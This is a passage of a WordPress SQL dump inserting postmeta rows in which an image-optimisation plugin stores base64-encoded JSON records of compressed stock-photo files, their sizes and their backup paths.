Dk1Mi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTQwLCJ0aW1lIjoxNDgzNTQ3NjM1LCJpZCI6Mjc4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQ0NzgwOTUyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0NDc4MDk1Mi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDQ3ODA5NTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjkyNCwidGltZSI6MTQ4MzU0NzYzOSwiaWQiOjI3ODl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28758, 2786, 'wpfc_optimisation_reduction', '1068293'); 
INSERT INTO `wp_postmeta` VALUES (28759, 2786, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDQzNzQyMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzA0Mzc0MjIuanBnIiwid2lkdGgiOjMwODAsImhlaWdodCI6MjA1MSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzA0Mzc0MjIuanBnIiwicmVkdWN0aW9uIjoxMDY4Mjg1LCJ0aW1lIjoxNDgzNTQ3NjU0LCJpZCI6IjI3ODYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzA0Mzc0MjItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwNDM3NDIyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDQzNzQyMi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzY2MCwiaWQiOjI3ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDQzNzQyMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzA0Mzc0MjItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwNDM3NDIyLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3NjYzLCJpZCI6Mjc4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwNDM3NDIyLTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDQzNzQyMi03Njh4NTExLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzA0Mzc0MjItNzY4eDUxMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc2NjcsImlkIjoyNzg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzA0Mzc0MjItMTYwMHgxMDY1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDQzNzQyMi0xNjAweDEwNjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDQzNzQyMi0xNjAweDEwNjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3NjcxLCJpZCI6Mjc4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwNDM3NDIyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDQzNzQyMi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzA0Mzc0MjItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc2NzQsImlkIjoyNzg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzA0Mzc0MjItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwNDM3NDIyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDQzNzQyMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzY3NiwiaWQiOjI3ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDQzNzQyMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzA0Mzc0MjItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwNDM3NDIyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3Njc5LCJpZCI6Mjc4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwNDM3NDIyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDQzNzQyMi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzA0Mzc0MjItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc2ODIsImlkIjoyNzg2fV0='); 
INSERT INTO `wp_postmeta` VALUES (28760, 2784, 'wpfc_optimisation_reduction', '9644'); 
INSERT INTO `wp_postmeta` VALUES (28761, 2784, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM4OTY5OTM2OC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zODk2OTkzNjguanBnIiwid2lkdGgiOjYwMDAsImhlaWdodCI6NDAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0NzY4NiwiaWQiOiIyNzg0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzg5Njk5MzY4LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM4OTY5OTM2OC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zODk2OTkzNjgtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjYwNiwidGltZSI6MTQ4MzU0NzY5MCwiaWQiOjI3ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM4OTY5OTM2OC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zODk2OTkzNjgtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzg5Njk5MzY4LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMjQzLCJ0aW1lIjoxNDgzNTQ3Njk0LCJpZCI6Mjc4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzg5Njk5MzY4LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM4OTY5OTM2OC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zODk2OTkzNjgtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEyMTMsInRpbWUiOjE0ODM1NDc2OTgsImlkIjoyNzg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zODk2OTkzNjgtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM4OTY5OTM2OC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM4OTY5OTM2OC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo0MTU5LCJ0aW1lIjoxNDgzNTQ3NzAzLCJpZCI6Mjc4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzg5Njk5MzY4LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM4OTY5OTM2OC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zODk2OTkzNjgtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUwOCwidGltZSI6MTQ4MzU0NzcwNiwiaWQiOjI3ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM4OTY5OTM2OC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zODk2OTkzNjgtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzg5Njk5MzY4LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NDAsInRpbWUiOjE0ODM1NDc3MDksImlkIjoyNzg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zODk2OTkzNjgtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzg5Njk5MzY4LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM4OTY5OTM2OC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDcyLCJ0aW1lIjoxNDgzNTQ3NzEzLCJpZCI6Mjc4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzg5Njk5MzY4LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM4OTY5OTM2OC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zODk2OTkzNjgtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMDMsInRpbWUiOjE0ODM1NDc3MTYsImlkIjoyNzg0fV0='); 
INSERT INTO `wp_postmeta` VALUES (28762, 2779, 'wpfc_optimisation_reduction', '6933'); 
INSERT INTO `wp_postmeta` VALUES (28763, 2779, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NjQ5ODcyMC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTY0OTg3MjAuanBnIiwid2lkdGgiOjU3NjAsImhlaWdodCI6Mzg0MCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0NzcyMSwiaWQiOiIyNzc5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk2NDk4NzIwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NjQ5ODcyMC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTY0OTg3MjAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc0NiwidGltZSI6MTQ4MzU0NzcyNCwiaWQiOjI3Nzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NjQ5ODcyMC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTY0OTg3MjAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk2NDk4NzIwLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNDkzLCJ0aW1lIjoxNDgzNTQ3NzI5LCJpZCI6Mjc3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk2NDk4NzIwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NjQ5ODcyMC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTY0OTg3MjAtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEzODcsInRpbWUiOjE0ODM1NDc3MzMsImlkIjoyNzc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTY0OTg3MjAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NjQ5ODcyMC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NjQ5ODcyMC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoyODYwLCJ0aW1lIjoxNDgzNTQ3NzM4LCJpZCI6Mjc3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk2NDk4NzIwLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NjQ5ODcyMC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTY0OTg3MjAtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjQ0NywidGltZSI6MTQ4MzU0Nzc0MiwiaWQiOjI3Nzl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28764, 2777, 'wpfc_optimisation_reduction', '9606'); 
